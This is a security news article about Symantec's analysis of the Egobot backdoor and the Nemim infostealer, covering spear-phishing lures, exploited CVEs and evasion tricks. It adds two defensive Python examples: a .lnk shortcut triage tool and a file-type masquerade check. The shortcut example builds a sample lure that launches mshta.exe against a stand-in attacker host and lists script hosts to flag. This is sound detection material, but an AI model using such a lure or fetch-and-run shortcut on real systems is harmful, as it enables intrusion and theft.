Researchers at Symantec say a sophisticated backdoor Trojan known as Egobot is targeting confidential information from South Korean companies as well as corporations doing business with South Korea.
The attack, which has been traced back to 2009, typically begins with a spear-phishing email carrying a malicious attachment. So far, the targeted businesses have fallen into four main categories: finance and investment, infrastructure and development, government agencies and defense contractors. While many of the victims have been in South Korea, others are located in Australia, Russia, Brazil and the United States.
“The attackers gather information about their targets using social engineering techniques prior to luring them into the trap,” explained Symantec’s Jeet Morparia. “The targets are sent a spear phishing email, often pretending to be sent from a person they already know. The spear phishing email contains a relevant or enticing message to the target, prompting them to open the malicious attachment. The malicious attachment may be a shortcut .lnk file that points to a file hosted on GeoCities Japan.”
In addition to .LNK files, the attackers have used malicious Microsoft Word documents that exploit CVE-2010-3333 (an RTF parsing flaw in Word) and CVE-2011-0609 (an Adobe Flash Player flaw reached through Flash content embedded in the document). They have also taken to using .HWP files, the Hangul Word Processor format widely used in South Korea, containing a script that downloads a malicious file.
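The shortcut lure is worth a closer look, because a .lnk file is easy to triage automatically: its target and command-line arguments sit in fixed-layout fields, so a mail gateway or analyst can pull them out and flag a shortcut that launches a script host or carries a URL. The parser below is an added example written for this article, not Symantec's code or anything recovered from the Egobot samples; it follows the public MS-SHLLINK layout (a 76-byte header, optional ID list and LinkInfo blocks, then the length-prefixed string fields). The two sample shortcuts, the hostname attacker.example and the list of script hosts are all constructed for the demonstration.

```python
"""Triage a Windows shortcut (.lnk) attachment: extract target and arguments,
flag shortcuts that launch a script host or point at a URL.

Layout per MS-SHLLINK: 76-byte ShellLinkHeader, optional LinkTargetIDList,
optional LinkInfo, then optional StringData fields (Name, RelativePath,
WorkingDir, Arguments, IconLocation), each a 2-byte character count + text."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that say which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Script hosts and downloaders a document shortcut should not launch (constructed list).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file; raise ValueError if not a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad header size")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize does not count its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            fields[name] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def triage_lnk(data: bytes) -> list:
    """Return the reasons a shortcut looks like a download lure (empty list = no indicators)."""
    info = parse_lnk(data)
    reasons = []
    target = (info["relative_path"] or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    args = (info["arguments"] or "").lower()
    if "http://" in args or "https://" in args:
        reasons.append("arguments contain a URL")
    return reasons


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk for testing (constructed sample, not a real lure)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))  # attributes, timestamps, icon, hotkey zeroed
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed samples: a shortcut that runs mshta.exe against a remote "document",
# and a harmless shortcut to a local file.
SAMPLE_LURE = build_lnk(r"..\..\Windows\System32\mshta.exe", "http://attacker.example/contract.xml")
SAMPLE_BENIGN = build_lnk(r"..\Documents\report.docx", "")

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, triage_lnk(blob) or ["no indicators"])
```

The parser deliberately stops before the ExtraData blocks; for a lure like the one described above, the target and arguments are what an analyst needs first, and anything that fails the header checks is not a shortcut at all and should be handled as an unknown binary.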
When an attachment is opened, it downloads an executable from GeoCities Japan, and that executable in turn retrieves a RAR file from the same host. Both files are disguised as XML documents in an attempt to pass as clean content, Morparia noted.
The RAR file carries a set of components responsible for moving files into place, injecting a component into running processes and collecting system information such as the Windows version, install language and installed service pack.
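Disguising the two staged files as XML only works against checks that trust the filename. The following is an added example, not Symantec's code or part of the article, of the check a proxy or sandbox would apply instead: classify the first bytes of the fetched content (the MZ/PE header of an executable, the RAR signature, a compound-file container) and compare that against what the extension claims. The sample blobs are constructed here to exercise the check; they are not the real Egobot artifacts.

```python
"""Check whether a fetched file is really what its name says it is.

A PE executable or RAR archive served under an .xml name is a mismatch
between claimed and actual content, whatever the server called it."""
import struct

# (magic bytes at offset 0, content kind) for formats other than PE.
SIGNATURES = (
    (b"Rar!\x1a\x07\x00", "rar"),                   # RAR 4.x archive
    (b"Rar!\x1a\x07\x01\x00", "rar"),               # RAR 5.x archive
    (b"PK\x03\x04", "zip"),                         # ZIP, also OOXML .docx
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "cfb"),   # OLE2 compound file: legacy .doc, HWP 5
)

# What content each claimed extension is expected to hold.
EXPECTED_KIND = {"xml": "xml", "rar": "rar", "exe": "pe", "dll": "pe",
                 "zip": "zip", "docx": "zip", "doc": "cfb", "hwp": "cfb"}


def identify(blob: bytes) -> str:
    """Classify a file by content. 'pe' only if the MZ stub's e_lfanew points at 'PE\\0\\0'."""
    if blob[:2] == b"MZ" and len(blob) >= 0x40:
        e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
        if blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
        return "mz-stub"  # DOS header without a PE header: odd, but not a Windows executable
    for magic, kind in SIGNATURES:
        if blob.startswith(magic):
            return kind
    head = blob.lstrip(b"\xef\xbb\xbf \t\r\n")  # tolerate a UTF-8 BOM and leading whitespace
    if head.startswith(b"<?xml") or head.startswith(b"<"):
        return "xml"
    return "unknown"


def masquerade_verdict(filename: str, blob: bytes) -> tuple:
    """Return (claimed_kind, actual_kind, is_masquerade)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXPECTED_KIND.get(ext, "unknown")
    actual = identify(blob)
    # An unknown on either side is not evidence; a known mismatch is.
    mismatch = claimed != "unknown" and actual != "unknown" and claimed != actual
    return claimed, actual, mismatch


# Constructed samples: a minimal PE header and a RAR 4 signature, each served
# under an .xml name, plus a genuine XML document with a UTF-8 BOM.
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
FAKE_RAR = b"Rar!\x1a\x07\x00" + b"\x00" * 16
REAL_XML = b"\xef\xbb\xbf<?xml version=\"1.0\"?><doc/>"

if __name__ == "__main__":
    for name, blob in (("update.xml", FAKE_PE), ("data.xml", FAKE_RAR), ("config.xml", REAL_XML)):
        print(name, masquerade_verdict(name, blob))
```

Checking e_lfanew rather than the two bytes "MZ" alone avoids flagging text that happens to start with those letters, and treating an unrecognised type as "no evidence" keeps the check from drowning analysts in alerts on formats it does not know.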
“The main payload has specific functions that are potentially disastrous for targeted business executives. These functions include: recording video, recording audio, taking screenshots, uploading files to a remote server, obtaining a recent document list, searching for a string or pattern in a file [and] deleting and setting restore points,” Morparia blogged. “The stolen information is uploaded to remote servers hosted in Malaysia, Hong Kong, and Canada. The attackers have also updated their code to include 64-bit versions to work seamlessly across 64-bit platforms.”
Egobot has been able to stay under the radar thanks to several components that mask its presence. For one, Egobot is built with an older version of Microsoft's Detours library, which ships the detoured.dll file; the attackers use it to attach malicious DLLs to legitimate Win32 binaries, so the backdoor runs inside the memory of a legitimate process and passes as a benign one, the researcher explained. Detours is a legitimate Microsoft instrumentation library, which helps the injected code avoid suspicion. In addition, a coordinator component prepares files by moving them into the appropriate folders and injecting them into legitimate processes, and certain versions of the backdoor include a timer so that the Trojan deletes itself after a set date.
Egobot has been linked to a parallel campaign, traced back to 2006, that uses an infostealer known as Nemim and has targeted organizations in Japan, the U.S., India and the United Kingdom.
“One of the earliest samples contained a timer mechanism to determine when to remove itself from the compromised computer,” blogged Symantec researcher Andrea Lelli. “Removal was conditional and tied to a fixed date or based on the number of times the sample was executed. The timer mechanism feature was also found in samples of Egobot.”
An analysis of the Nemim binaries also revealed other connections to Egobot, including similarities in the command-and-control communication format and the use of encryption. While Egobot is highly targeted and estimated to have infected fewer than 100 machines, Nemim is believed to have affected thousands.
“Nemim continues to operate today and has effectively evolved over time,” blogged Lelli. “For instance, the string encryption has become non-trivial, stolen digital certificates have been upgraded with newer ones, and there are now checks in place to detect common virtual machines. Indeed, for the last seven years the attackers have shown an unwavering commitment to innovation and have developed malware that is adaptable to fit the needs of two different attack campaigns.”